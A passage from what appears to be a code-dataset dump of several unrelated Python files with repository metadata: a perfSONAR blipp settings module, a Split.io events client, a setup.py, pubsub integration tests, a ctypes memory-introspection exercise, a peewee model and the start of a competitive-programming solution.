'PLAIN': 'text/plain',
'SSE': 'text/event-stream',
'PSJSON': 'application/perfsonar+json',
'PSBSON': 'application/perfsonar+bson',
'PSXML': 'application/perfsonar+xml',
}
'''
Calculate URN deterministic way with a goal to make it as unique as
possible. We might still get into situation where urn might not be unique
if appropriate reverse dns entries are not set or duplicate MAC addresses
are used.
We construct urn as follows.
case 1) socket.getfqdn() resolves into monitor.incentre.iu.edu then
urn=urn:ogf:network:domain=incentre.iu.edu:node=monitor:
case 2) socket.getgqdn() fails then
urn=urn:ogf:network:domain=<FQDN>:node=<default_interface_ip>_<mac_address_of_default_interface>_<hostname>:
'''
HOSTNAME = socket.getfqdn() ### this might fail n give hostname
fqdn = socket.getfqdn()
hostname = socket.gethostname()
if not fqdn or not hostname:
raise Exception("socket.getfqdn or socket.gethostname failed.\
Try setting urn manually.")
#we check fqdn != hostname, if not then we have success
if fqdn != hostname:
domain = fqdn.replace(hostname+".", "")
HOST_URN = "urn:ogf:network:domain=%s:node=%s:" % (domain, hostname)
else:
try:
default_ip, default_iface = utils.get_default_gateway_linux()
default_ip = netifaces.ifaddresses(default_iface)[netifaces.AF_INET][0]["addr"]
default_mac = netifaces.ifaddresses(default_iface)[netifaces.AF_LINK][0]["addr"]
default_mac = utils.clean_mac(default_mac)
HOST_URN = "urn:ogf:network:domain=%s:node=%s_%s_%s" % \
(fqdn, default_ip, default_mac, hostname)
except Exception:
domain = fqdn.replace(hostname+".", "")
HOST_URN = "urn:ogf:network:domain=%s:node=%s:" % (domain, hostname)
NODE_INFO_FILE="/usr/local/etc/node.info"
STANDALONE_DEFAULTS = {
"$schema": SCHEMAS["services"],
"status": "ON",
"serviceType": "ps:tools:blipp",
"ttl": 600,
"properties": {
"configurations": {
"unis_url": "http://localhost:8888",
"unis_max_backoff": 3600,
"unis_poll_interval":300,
"use_ssl": "",
"ssl_cafile": "",
"probe_defaults": {
"collection_schedule": "builtins.simple",
"schedule_params": {"every": 2}, # run every 2 seconds
"collection_size": 10000000, # ~10 megabytes
"collection_ttl": 1500000, # ~17 days
"reporting_params": 1, # report every probe (no default aggregation)
"reporting_tolerance": 10 # store 10 on unreachable MS
},
"probes": {
}
}
}
}
nconf = {}
AUTH_UUID = None
UNIS_ID = None
MS_URL = None
GN_ADDR = None
try:
with open(NODE_INFO_FILE, 'r') as cfile:
for line in cfile:
name, var = line.partition("=")[::2]
nconf[name.strip()] = str(var).rstrip()
try:
MS_URL = nconf['ms_instance']
except Exception as e:
pass
try:
AUTH_UUID = nconf['auth_uuid']
except Exception as e:
pass
try:
UNIS_ID = nconf['unis_id']
except Exception as e:
pass
try:
GN_ADDR = nconf['gn_address']
except Exception as e:
pass
except IOError:
pass
if AUTH_UUID:
STANDALONE_DEFAULTS["properties"].update({"geni": {"slice_uuid":AUTH_UUID}})
if MS_URL:
STANDALONE_DEFAULTS["properties"]["configurations"]["probe_defaults"].update({"ms_url":MS_URL})
##################################################################
# Netlogger stuff... pasted from Ahmed's peri-tornado
##################################################################
import logging, logging.handlers
from netlogger import nllog
DEBUG = False
TRACE = False
CONSOLE = True
NETLOGGER_NAMESPACE = "blippd"
WORKSPACE = "."
def config_logger():
"""Configures netlogger"""
nllog.PROJECT_NAMESPACE = NETLOGGER_NAMESPACE
#logging.setLoggerClass(nllog.PrettyBPLogger)
logging.setLoggerClass(nllog.BPLogger)
log = logging.getLogger(nllog.PROJECT_NAMESPACE)
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter("%(message)s"))
log.addHandler(handler)
if GN_ADDR:
# setup socket to global node, GN
socketHandler = logging.handlers.SocketHandler(GN_ADDR,
logging.handlers.DEFAULT_TCP_LOGGING_PORT)
log.addHandler(socketHandler)
# set level
if TRACE:
log_level = (logging.WARN, logging.INFO, logging.DEBUG,
nllog.TRACE)[3]
elif DEBUG:
log_level = (logging.WARN, logging.INFO, logging.DEBUG,
nllog.TRACE)[2]
elif CONSOLE:
log_level = (logging.WARN, logging.INFO, logging.DEBUG,
25)[3]
else:
log_level = (logging.WARN, logging.INFO, logging.DEBUG,
nllog.TRACE)[1]
log.setLevel(log_level)
def get_logger(namespace=NETLOGGER_NAMESPACE, logfile=None, level=None):
"""Return logger object"""
# Test if netlogger is initialized
if nllog.PROJECT_NAMESPACE != NETLOGGER_NAMESPACE:
config_logger()
if logfile:
add_filehandler(logfile)
if level:
set_level(level)
return nllog.get_logger(namespace)
##################################################################
# Read in a configuration file
##################################################################
CONFIG_FILE="/etc/periscope/blippd.conf"
config = ConfigParser.RawConfigParser()
config.read(CONFIG_FILE)
main_config = ["unis_url", "ms_url", "data_file", "ssl_cert", "ssl_key",
"ssl_cafile", "unis_poll_interval", "use_ssl"]
probe_map = {"registration_probe": ["service_type", "service_name", "service_description",
"service_accesspoint", "pidfile", "process_name",
"service_ttl"],
"net": ["unis_url"],
"cpu": ["proc_dir"],
"mem": []}
for key in main_config:
try:
value = config.get("main", key)
STANDALONE_DEFAULTS["properties"]["configurations"].update({key: value})
except:
pass
for section in config.sections():
if section == "main":
continue
module = config.get(section, "module")
if module in probe_map.keys():
conf = dict()
conf.update({"probe_module": module})
# set the schedule interval if present (otherwise will get probe default)
try:
conf.update({"schedule_params": {"every": (int)(config.get(section, "interval"))}})
except:
pass
for key in probe_map[module]:
try:
value = config.get(section, key)
conf.update({key: value})
except:
pass
STANDALONE_DEFAULTS["properties"]["configurations"]["probes"].update({section: conf})
| 35.466912 | 110 | 0.597077 | # =============================================================================
# periscope-ps (blipp)
#
# Copyright (c) 2013-2016, Trustees of Indiana University,
# All rights reserved.
#
# This software may be modified and distributed under the terms of the BSD
# license. See the COPYING file for details.
#
# This software was created at the Indiana University Center for Research in
# Extreme Scale Technologies (CREST).
# =============================================================================
import ConfigParser
import socket
import netifaces
import utils
SCHEMAS = {
'networkresources': 'http://unis.crest.iu.edu/schema/20160630/networkresource#',
'nodes': 'http://unis.crest.iu.edu/schema/20160630/node#',
'domains': 'http://unis.crest.iu.edu/schema/20160630/domain#',
'ports': 'http://unis.crest.iu.edu/schema/20160630/port#',
'links': 'http://unis.crest.iu.edu/schema/20160630/link#',
'paths': 'http://unis.crest.iu.edu/schema/20160630/path#',
'networks': 'http://unis.crest.iu.edu/schema/20160630/network#',
'topologies': 'http://unis.crest.iu.edu/schema/20160630/topology#',
'services': 'http://unis.crest.iu.edu/schema/20160630/service#',
'blipp': 'http://unis.crest.iu.edu/schema/20160630/blipp#',
'metadata': 'http://unis.crest.iu.edu/schema/20160630/metadata#',
'datum': 'http://unis.crest.iu.edu/schema/20160630/datum#',
'data': 'http://unis.crest.iu.edu/schema/20160630/data#',
'measurement': 'http://unis.crest.iu.edu/schema/20160630/measurement#',
}
MIME = {
'HTML': 'text/html',
'JSON': 'application/json',
'PLAIN': 'text/plain',
'SSE': 'text/event-stream',
'PSJSON': 'application/perfsonar+json',
'PSBSON': 'application/perfsonar+bson',
'PSXML': 'application/perfsonar+xml',
}
'''
Calculate URN deterministic way with a goal to make it as unique as
possible. We might still get into situation where urn might not be unique
if appropriate reverse dns entries are not set or duplicate MAC addresses
are used.
We construct urn as follows.
case 1) socket.getfqdn() resolves into monitor.incentre.iu.edu then
urn=urn:ogf:network:domain=incentre.iu.edu:node=monitor:
case 2) socket.getgqdn() fails then
urn=urn:ogf:network:domain=<FQDN>:node=<default_interface_ip>_<mac_address_of_default_interface>_<hostname>:
'''
HOSTNAME = socket.getfqdn() ### this might fail n give hostname
fqdn = socket.getfqdn()
hostname = socket.gethostname()
if not fqdn or not hostname:
raise Exception("socket.getfqdn or socket.gethostname failed.\
Try setting urn manually.")
#we check fqdn != hostname, if not then we have success
if fqdn != hostname:
domain = fqdn.replace(hostname+".", "")
HOST_URN = "urn:ogf:network:domain=%s:node=%s:" % (domain, hostname)
else:
try:
default_ip, default_iface = utils.get_default_gateway_linux()
default_ip = netifaces.ifaddresses(default_iface)[netifaces.AF_INET][0]["addr"]
default_mac = netifaces.ifaddresses(default_iface)[netifaces.AF_LINK][0]["addr"]
default_mac = utils.clean_mac(default_mac)
HOST_URN = "urn:ogf:network:domain=%s:node=%s_%s_%s" % \
(fqdn, default_ip, default_mac, hostname)
except Exception:
domain = fqdn.replace(hostname+".", "")
HOST_URN = "urn:ogf:network:domain=%s:node=%s:" % (domain, hostname)
NODE_INFO_FILE="/usr/local/etc/node.info"
STANDALONE_DEFAULTS = {
"$schema": SCHEMAS["services"],
"status": "ON",
"serviceType": "ps:tools:blipp",
"ttl": 600,
"properties": {
"configurations": {
"unis_url": "http://localhost:8888",
"unis_max_backoff": 3600,
"unis_poll_interval":300,
"use_ssl": "",
"ssl_cafile": "",
"probe_defaults": {
"collection_schedule": "builtins.simple",
"schedule_params": {"every": 2}, # run every 2 seconds
"collection_size": 10000000, # ~10 megabytes
"collection_ttl": 1500000, # ~17 days
"reporting_params": 1, # report every probe (no default aggregation)
"reporting_tolerance": 10 # store 10 on unreachable MS
},
"probes": {
}
}
}
}
nconf = {}
AUTH_UUID = None
UNIS_ID = None
MS_URL = None
GN_ADDR = None
try:
with open(NODE_INFO_FILE, 'r') as cfile:
for line in cfile:
name, var = line.partition("=")[::2]
nconf[name.strip()] = str(var).rstrip()
try:
MS_URL = nconf['ms_instance']
except Exception as e:
pass
try:
AUTH_UUID = nconf['auth_uuid']
except Exception as e:
pass
try:
UNIS_ID = nconf['unis_id']
except Exception as e:
pass
try:
GN_ADDR = nconf['gn_address']
except Exception as e:
pass
except IOError:
pass
if AUTH_UUID:
STANDALONE_DEFAULTS["properties"].update({"geni": {"slice_uuid":AUTH_UUID}})
if MS_URL:
STANDALONE_DEFAULTS["properties"]["configurations"]["probe_defaults"].update({"ms_url":MS_URL})
##################################################################
# Netlogger stuff... pasted from Ahmed's peri-tornado
##################################################################
import logging, logging.handlers
from netlogger import nllog
DEBUG = False
TRACE = False
CONSOLE = True
NETLOGGER_NAMESPACE = "blippd"
WORKSPACE = "."
def config_logger():
"""Configures netlogger"""
nllog.PROJECT_NAMESPACE = NETLOGGER_NAMESPACE
#logging.setLoggerClass(nllog.PrettyBPLogger)
logging.setLoggerClass(nllog.BPLogger)
log = logging.getLogger(nllog.PROJECT_NAMESPACE)
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter("%(message)s"))
log.addHandler(handler)
if GN_ADDR:
# setup socket to global node, GN
socketHandler = logging.handlers.SocketHandler(GN_ADDR,
logging.handlers.DEFAULT_TCP_LOGGING_PORT)
log.addHandler(socketHandler)
# set level
if TRACE:
log_level = (logging.WARN, logging.INFO, logging.DEBUG,
nllog.TRACE)[3]
elif DEBUG:
log_level = (logging.WARN, logging.INFO, logging.DEBUG,
nllog.TRACE)[2]
elif CONSOLE:
log_level = (logging.WARN, logging.INFO, logging.DEBUG,
25)[3]
else:
log_level = (logging.WARN, logging.INFO, logging.DEBUG,
nllog.TRACE)[1]
log.setLevel(log_level)
def add_filehandler(logfile):
log = logging.getLogger(nllog.PROJECT_NAMESPACE)
log.handlers = []
try:
fileHandler = logging.handlers.RotatingFileHandler(logfile, maxBytes = 500000, backupCount = 5)
fileHandler.setFormatter(logging.Formatter("%(message)s"))
log.addHandler(fileHandler)
except AttributeError as exp:
log.error("Could not attach File Logger: {exp}".format(exp = exp))
def set_level(level):
log = logging.getLogger(nllog.PROJECT_NAMESPACE)
level = level.upper()
if level == 'TRACE':
log_level = (logging.WARN, logging.INFO, logging.DEBUG,
nllog.TRACE)[3]
elif level == 'DEBUG':
log_level = (logging.WARN, logging.INFO, logging.DEBUG,
nllog.TRACE)[2]
elif level == 'CONSOLE':
log_level = (logging.WARN, logging.INFO, logging.DEBUG,
25)[3]
else:
return
log.setLevel(log_level)
def get_logger(namespace=NETLOGGER_NAMESPACE, logfile=None, level=None):
"""Return logger object"""
# Test if netlogger is initialized
if nllog.PROJECT_NAMESPACE != NETLOGGER_NAMESPACE:
config_logger()
if logfile:
add_filehandler(logfile)
if level:
set_level(level)
return nllog.get_logger(namespace)
##################################################################
# Read in a configuration file
##################################################################
CONFIG_FILE="/etc/periscope/blippd.conf"
config = ConfigParser.RawConfigParser()
config.read(CONFIG_FILE)
main_config = ["unis_url", "ms_url", "data_file", "ssl_cert", "ssl_key",
"ssl_cafile", "unis_poll_interval", "use_ssl"]
probe_map = {"registration_probe": ["service_type", "service_name", "service_description",
"service_accesspoint", "pidfile", "process_name",
"service_ttl"],
"net": ["unis_url"],
"cpu": ["proc_dir"],
"mem": []}
for key in main_config:
try:
value = config.get("main", key)
STANDALONE_DEFAULTS["properties"]["configurations"].update({key: value})
except:
pass
for section in config.sections():
if section == "main":
continue
module = config.get(section, "module")
if module in probe_map.keys():
conf = dict()
conf.update({"probe_module": module})
# set the schedule interval if present (otherwise will get probe default)
try:
conf.update({"schedule_params": {"every": (int)(config.get(section, "interval"))}})
except:
pass
for key in probe_map[module]:
try:
value = config.get(section, key)
conf.update({key: value})
except:
pass
STANDALONE_DEFAULTS["properties"]["configurations"]["probes"].update({section: conf})
| 932 | 0 | 50 |
b9f177e501e7c5bddcdd1967d9b11cff801d70cd | 2,480 | py | Python | splitio/api/events.py | nhausman1/python-client | b15f76977dc3178634ee8e007b53f613ddd2ac7c | [
"Apache-2.0"
] | null | null | null | splitio/api/events.py | nhausman1/python-client | b15f76977dc3178634ee8e007b53f613ddd2ac7c | [
"Apache-2.0"
] | null | null | null | splitio/api/events.py | nhausman1/python-client | b15f76977dc3178634ee8e007b53f613ddd2ac7c | [
"Apache-2.0"
] | null | null | null | """Events API module."""
import logging
from future.utils import raise_from
from splitio.api import APIException, headers_from_metadata
from splitio.api.client import HttpClientException
class EventsAPI(object): # pylint: disable=too-few-public-methods
"""Class that uses an httpClient to communicate with the events API."""
def __init__(self, http_client, apikey, sdk_metadata):
"""
Class constructor.
:param http_client: HTTP Client responsble for issuing calls to the backend.
:type http_client: HttpClient
:param apikey: User apikey token.
:type apikey: string
:param sdk_metadata: SDK version & machine name & IP.
:type sdk_metadata: splitio.client.util.SdkMetadata
"""
self._logger = logging.getLogger(self.__class__.__name__)
self._client = http_client
self._apikey = apikey
self._metadata = headers_from_metadata(sdk_metadata)
@staticmethod
def _build_bulk(events):
"""
Build event bulk as expected by the API.
:param events: Events to be bundled.
:type events: list(splitio.models.events.Event)
:return: Formatted bulk.
:rtype: dict
"""
return [
{
'key': event.key,
'trafficTypeName': event.traffic_type_name,
'eventTypeId': event.event_type_id,
'value': event.value,
'timestamp': event.timestamp,
'properties': event.properties,
}
for event in events
]
def flush_events(self, events):
"""
Send events to the backend.
:param events: Events bulk
:type events: list
:return: True if flush was successful. False otherwise
:rtype: bool
"""
bulk = self._build_bulk(events)
try:
response = self._client.post(
'events',
'/events/bulk',
self._apikey,
body=bulk,
extra_headers=self._metadata
)
if not 200 <= response.status_code < 300:
raise APIException(response.body, response.status_code)
except HttpClientException as exc:
self._logger.error('Http client is throwing exceptions')
self._logger.debug('Error: ', exc_info=True)
raise_from(APIException('Events not flushed properly.'), exc)
| 32.207792 | 84 | 0.593952 | """Events API module."""
import logging
from future.utils import raise_from
from splitio.api import APIException, headers_from_metadata
from splitio.api.client import HttpClientException
class EventsAPI(object): # pylint: disable=too-few-public-methods
"""Class that uses an httpClient to communicate with the events API."""
def __init__(self, http_client, apikey, sdk_metadata):
"""
Class constructor.
:param http_client: HTTP Client responsble for issuing calls to the backend.
:type http_client: HttpClient
:param apikey: User apikey token.
:type apikey: string
:param sdk_metadata: SDK version & machine name & IP.
:type sdk_metadata: splitio.client.util.SdkMetadata
"""
self._logger = logging.getLogger(self.__class__.__name__)
self._client = http_client
self._apikey = apikey
self._metadata = headers_from_metadata(sdk_metadata)
@staticmethod
def _build_bulk(events):
"""
Build event bulk as expected by the API.
:param events: Events to be bundled.
:type events: list(splitio.models.events.Event)
:return: Formatted bulk.
:rtype: dict
"""
return [
{
'key': event.key,
'trafficTypeName': event.traffic_type_name,
'eventTypeId': event.event_type_id,
'value': event.value,
'timestamp': event.timestamp,
'properties': event.properties,
}
for event in events
]
def flush_events(self, events):
"""
Send events to the backend.
:param events: Events bulk
:type events: list
:return: True if flush was successful. False otherwise
:rtype: bool
"""
bulk = self._build_bulk(events)
try:
response = self._client.post(
'events',
'/events/bulk',
self._apikey,
body=bulk,
extra_headers=self._metadata
)
if not 200 <= response.status_code < 300:
raise APIException(response.body, response.status_code)
except HttpClientException as exc:
self._logger.error('Http client is throwing exceptions')
self._logger.debug('Error: ', exc_info=True)
raise_from(APIException('Events not flushed properly.'), exc)
| 0 | 0 | 0 |
646aac25839c24a2acd9f04a89f56df8ba58a243 | 340 | py | Python | setup.py | jakesen/pyhatchbuck | 1bbefe52f46f05709e8272dcdbdb636d7e13325e | [
"MIT"
] | 1 | 2019-10-24T14:45:46.000Z | 2019-10-24T14:45:46.000Z | setup.py | jakesen/pyhatchbuck | 1bbefe52f46f05709e8272dcdbdb636d7e13325e | [
"MIT"
] | 7 | 2017-02-16T19:35:50.000Z | 2020-01-30T14:05:13.000Z | setup.py | jakesen/pyhatchbuck | 1bbefe52f46f05709e8272dcdbdb636d7e13325e | [
"MIT"
] | 3 | 2018-03-26T07:58:55.000Z | 2019-12-12T19:32:34.000Z | from setuptools import setup
setup(
name='pyhatchbuck',
version='0.4',
description='Python library for Hatchbuck API',
url='https://github.com/jakesen/pyhatchbuck',
author='Jacob Senecal',
author_email='jacob.senecal@gmail.com',
license='MIT',
packages=['hatchbuck',],
install_requires=['requests',],
)
| 24.285714 | 51 | 0.673529 | from setuptools import setup
setup(
name='pyhatchbuck',
version='0.4',
description='Python library for Hatchbuck API',
url='https://github.com/jakesen/pyhatchbuck',
author='Jacob Senecal',
author_email='jacob.senecal@gmail.com',
license='MIT',
packages=['hatchbuck',],
install_requires=['requests',],
)
| 0 | 0 | 0 |
0b2fb33ea9fc52a75ecaa6f5939d979600bd1d27 | 3,910 | py | Python | tests/integration/test_pubsub.py | ghga-de/internal-file-registry-service | 99892159f5b70184db6609e8c9ce3deb33fd335b | [
"Apache-2.0"
] | null | null | null | tests/integration/test_pubsub.py | ghga-de/internal-file-registry-service | 99892159f5b70184db6609e8c9ce3deb33fd335b | [
"Apache-2.0"
] | 7 | 2021-11-11T12:28:43.000Z | 2022-01-19T18:00:56.000Z | tests/integration/test_pubsub.py | ghga-de/internal-file-registry-service | 99892159f5b70184db6609e8c9ce3deb33fd335b | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 - 2022 Universität Tübingen, DKFZ and EMBL
# for the German Human Genome-Phenome Archive (GHGA)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test the messaging API (pubsub)"""
from typing import Any, Callable, Dict
from ghga_message_schemas import schemas
from ghga_service_chassis_lib.utils import exec_with_timeout
from internal_file_registry_service.pubsub import (
subscribe_registration_request,
subscribe_stage_requests,
)
from ..fixtures import ( # noqa: F401
DEFAULT_CONFIG,
amqp_fixture,
get_config,
psql_fixture,
s3_fixture,
state,
)
def sub_and_pub_test_generic(
upstream_topic_name: str,
downstream_topic_name: str,
upstream_message: Dict[str, Any],
upstream_msg_schema: dict,
downstream_msg_schema: dict,
subscribe_func: Callable,
psql_fixture, # noqa: F811
s3_fixture, # noqa: F811
amqp_fixture, # noqa: F811
):
"""Generic function for testing functions that first subscribe and then publish."""
config = get_config(
sources=[psql_fixture.config, s3_fixture.config, amqp_fixture.config]
)
# initialize upstream and downstream test services that will publish or receive
# messages to or from this service:
upstream_publisher = amqp_fixture.get_test_publisher(
topic_name=upstream_topic_name,
message_schema=upstream_msg_schema,
)
downstream_subscriber = amqp_fixture.get_test_subscriber(
topic_name=downstream_topic_name,
message_schema=downstream_msg_schema,
)
# publish a stage request:
upstream_publisher.publish(upstream_message)
# process the stage request:
exec_with_timeout(
func=lambda: subscribe_func(config=config, run_forever=False),
timeout_after=2,
)
# expect stage confirmation message:
downstream_message = downstream_subscriber.subscribe(timeout_after=2)
assert downstream_message["file_id"] == upstream_message["file_id"]
def test_subscribe_stage_requests(psql_fixture, s3_fixture, amqp_fixture): # noqa: F811
"""Test `subscribe_stage_requests` function"""
sub_and_pub_test_generic(
upstream_topic_name=DEFAULT_CONFIG.topic_name_stage_request,
downstream_topic_name=DEFAULT_CONFIG.topic_name_staged_to_outbox,
upstream_message=state.FILES["no_grouping_label_in_message"].message, # type: ignore
upstream_msg_schema=schemas.SCHEMAS["non_staged_file_requested"],
downstream_msg_schema=schemas.SCHEMAS["file_staged_for_download"],
subscribe_func=subscribe_stage_requests,
psql_fixture=psql_fixture,
s3_fixture=s3_fixture,
amqp_fixture=amqp_fixture,
)
def test_subscribe_registration_request(
psql_fixture, s3_fixture, amqp_fixture # noqa: F811
):
"""Test `subscribe_registration_request` function"""
sub_and_pub_test_generic(
upstream_topic_name=DEFAULT_CONFIG.topic_name_reg_request,
downstream_topic_name=DEFAULT_CONFIG.topic_name_registered,
upstream_message=state.FILES["in_inbox_only"].message, # type: ignore
upstream_msg_schema=schemas.SCHEMAS["file_upload_received"],
downstream_msg_schema=schemas.SCHEMAS["file_internally_registered"],
subscribe_func=subscribe_registration_request,
psql_fixture=psql_fixture,
s3_fixture=s3_fixture,
amqp_fixture=amqp_fixture,
)
| 34.60177 | 93 | 0.749361 | # Copyright 2021 - 2022 Universität Tübingen, DKFZ and EMBL
# for the German Human Genome-Phenome Archive (GHGA)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test the messaging API (pubsub)"""
from typing import Any, Callable, Dict
from ghga_message_schemas import schemas
from ghga_service_chassis_lib.utils import exec_with_timeout
from internal_file_registry_service.pubsub import (
subscribe_registration_request,
subscribe_stage_requests,
)
from ..fixtures import ( # noqa: F401
DEFAULT_CONFIG,
amqp_fixture,
get_config,
psql_fixture,
s3_fixture,
state,
)
def sub_and_pub_test_generic(
upstream_topic_name: str,
downstream_topic_name: str,
upstream_message: Dict[str, Any],
upstream_msg_schema: dict,
downstream_msg_schema: dict,
subscribe_func: Callable,
psql_fixture, # noqa: F811
s3_fixture, # noqa: F811
amqp_fixture, # noqa: F811
):
"""Generic function for testing functions that first subscribe and then publish."""
config = get_config(
sources=[psql_fixture.config, s3_fixture.config, amqp_fixture.config]
)
# initialize upstream and downstream test services that will publish or receive
# messages to or from this service:
upstream_publisher = amqp_fixture.get_test_publisher(
topic_name=upstream_topic_name,
message_schema=upstream_msg_schema,
)
downstream_subscriber = amqp_fixture.get_test_subscriber(
topic_name=downstream_topic_name,
message_schema=downstream_msg_schema,
)
# publish a stage request:
upstream_publisher.publish(upstream_message)
# process the stage request:
exec_with_timeout(
func=lambda: subscribe_func(config=config, run_forever=False),
timeout_after=2,
)
# expect stage confirmation message:
downstream_message = downstream_subscriber.subscribe(timeout_after=2)
assert downstream_message["file_id"] == upstream_message["file_id"]
def test_subscribe_stage_requests(psql_fixture, s3_fixture, amqp_fixture): # noqa: F811
"""Test `subscribe_stage_requests` function"""
sub_and_pub_test_generic(
upstream_topic_name=DEFAULT_CONFIG.topic_name_stage_request,
downstream_topic_name=DEFAULT_CONFIG.topic_name_staged_to_outbox,
upstream_message=state.FILES["no_grouping_label_in_message"].message, # type: ignore
upstream_msg_schema=schemas.SCHEMAS["non_staged_file_requested"],
downstream_msg_schema=schemas.SCHEMAS["file_staged_for_download"],
subscribe_func=subscribe_stage_requests,
psql_fixture=psql_fixture,
s3_fixture=s3_fixture,
amqp_fixture=amqp_fixture,
)
def test_subscribe_registration_request(
psql_fixture, s3_fixture, amqp_fixture # noqa: F811
):
"""Test `subscribe_registration_request` function"""
sub_and_pub_test_generic(
upstream_topic_name=DEFAULT_CONFIG.topic_name_reg_request,
downstream_topic_name=DEFAULT_CONFIG.topic_name_registered,
upstream_message=state.FILES["in_inbox_only"].message, # type: ignore
upstream_msg_schema=schemas.SCHEMAS["file_upload_received"],
downstream_msg_schema=schemas.SCHEMAS["file_internally_registered"],
subscribe_func=subscribe_registration_request,
psql_fixture=psql_fixture,
s3_fixture=s3_fixture,
amqp_fixture=amqp_fixture,
)
| 0 | 0 | 0 |
f37eb1e7c63115be41814766b49df794657c5220 | 814 | py | Python | Lesson_6/task_5.py | nvv11/algorithms_and_data_structures_in_python | b87f7f618077d1bbf6c71c19845b1eaf62c07240 | [
"MIT"
] | null | null | null | Lesson_6/task_5.py | nvv11/algorithms_and_data_structures_in_python | b87f7f618077d1bbf6c71c19845b1eaf62c07240 | [
"MIT"
] | null | null | null | Lesson_6/task_5.py | nvv11/algorithms_and_data_structures_in_python | b87f7f618077d1bbf6c71c19845b1eaf62c07240 | [
"MIT"
] | null | null | null | import sys
import ctypes
import struct
a = 59
x = y = a
b = 125.54
c = 'Hello World!'
print(id(a))
print(sys.getsizeof(a))
print(ctypes.string_at(id(a), sys.getsizeof(a)))
print(struct.unpack('LLLLLLl', ctypes.string_at(id(a), sys.getsizeof(a))))
print(id(int))
print('*' * 50)
print(id(b))
print(sys.getsizeof(b))
z = b
b = 122.99
print(ctypes.string_at(id(b), sys.getsizeof(b)))
print(struct.unpack('LLLd', ctypes.string_at(id(b), sys.getsizeof(b))))
print(id(float))
print('*' * 50)
print(id(c))
print(sys.getsizeof(c))
z = b
b = 122.99
print(ctypes.string_at(id(c), sys.getsizeof(c)))
print(struct.unpack('LLLLLLLLLLli' + 'c' * 13, ctypes.string_at(id(c), sys.getsizeof(c))))
print('*' * 50)
lst = [1, 2, 3, 4]
print(struct.unpack('LLLL' + 'L' * 5 * 4, ctypes.string_at(id(lst), sys.getsizeof(lst))))
| 20.35 | 90 | 0.659705 | import sys
import ctypes
import struct
a = 59
x = y = a
b = 125.54
c = 'Hello World!'
print(id(a))
print(sys.getsizeof(a))
print(ctypes.string_at(id(a), sys.getsizeof(a)))
print(struct.unpack('LLLLLLl', ctypes.string_at(id(a), sys.getsizeof(a))))
print(id(int))
print('*' * 50)
print(id(b))
print(sys.getsizeof(b))
z = b
b = 122.99
print(ctypes.string_at(id(b), sys.getsizeof(b)))
print(struct.unpack('LLLd', ctypes.string_at(id(b), sys.getsizeof(b))))
print(id(float))
print('*' * 50)
print(id(c))
print(sys.getsizeof(c))
z = b
b = 122.99
print(ctypes.string_at(id(c), sys.getsizeof(c)))
print(struct.unpack('LLLLLLLLLLli' + 'c' * 13, ctypes.string_at(id(c), sys.getsizeof(c))))
print('*' * 50)
lst = [1, 2, 3, 4]
print(struct.unpack('LLLL' + 'L' * 5 * 4, ctypes.string_at(id(lst), sys.getsizeof(lst))))
| 0 | 0 | 0 |
11ad7fb150c1adc76c00f3f3c606dbf1315ec398 | 679 | py | Python | inscrawler/persistence/entity/post_entity.py | aonurdemir/instagram-crawler | ffb11e3f10ab6ca276fecd4ca527b7661db2704d | [
"MIT"
] | null | null | null | inscrawler/persistence/entity/post_entity.py | aonurdemir/instagram-crawler | ffb11e3f10ab6ca276fecd4ca527b7661db2704d | [
"MIT"
] | null | null | null | inscrawler/persistence/entity/post_entity.py | aonurdemir/instagram-crawler | ffb11e3f10ab6ca276fecd4ca527b7661db2704d | [
"MIT"
] | null | null | null | from peewee import AutoField, TextField, BigIntegerField, BooleanField, ForeignKeyField
from inscrawler.persistence.entity.base_model import BaseModel
from inscrawler.persistence.entity.profile_entity import ProfileEntity
# TODO create indexes
| 32.333333 | 87 | 0.761414 | from peewee import AutoField, TextField, BigIntegerField, BooleanField, ForeignKeyField
from inscrawler.persistence.entity.base_model import BaseModel
from inscrawler.persistence.entity.profile_entity import ProfileEntity
# TODO create indexes
class PostEntity(BaseModel):
id = AutoField(null=False)
profile = ForeignKeyField(ProfileEntity, null=True)
url = TextField(null=True)
url_imgs = TextField(null=True)
post_date = BigIntegerField(null=True)
caption = TextField(null=True)
last_visit = BigIntegerField(null=True)
created_at = BigIntegerField(null=True)
deleted = BooleanField(null=True)
class Meta:
table_name = 'post'
| 0 | 410 | 22 |
7d2f42eb86b215815ade249efd60a94bd2c8d53b | 521 | py | Python | arc/arc110/a/main.py | tonko2/AtCoder | 5d617072517881d226d7c8af09cb88684d41af7e | [
"Xnet",
"X11",
"CECILL-B"
] | 2 | 2022-01-22T07:56:58.000Z | 2022-01-24T00:29:37.000Z | arc/arc110/a/main.py | tonko2/AtCoder | 5d617072517881d226d7c8af09cb88684d41af7e | [
"Xnet",
"X11",
"CECILL-B"
] | null | null | null | arc/arc110/a/main.py | tonko2/AtCoder | 5d617072517881d226d7c8af09cb88684d41af7e | [
"Xnet",
"X11",
"CECILL-B"
] | null | null | null | import sys
import math
from collections import defaultdict, deque
sys.setrecursionlimit(10 ** 6)
stdin = sys.stdin
INF = float('inf')
MOD = 10 ** 9 + 7
ni = lambda: int(ns())
na = lambda: list(map(int, stdin.readline().split()))
ns = lambda: stdin.readline().strip()
N = ni()
ans = 1
A = []
for i in range(2, N + 1):
A.append(i)
print(lcm(A) + 1) | 18.607143 | 53 | 0.568138 | import sys
import math
from collections import defaultdict, deque
sys.setrecursionlimit(10 ** 6)
stdin = sys.stdin
INF = float('inf')
MOD = 10 ** 9 + 7
ni = lambda: int(ns())
na = lambda: list(map(int, stdin.readline().split()))
ns = lambda: stdin.readline().strip()
def lcm(A):
res = A[0]
N = len(A)
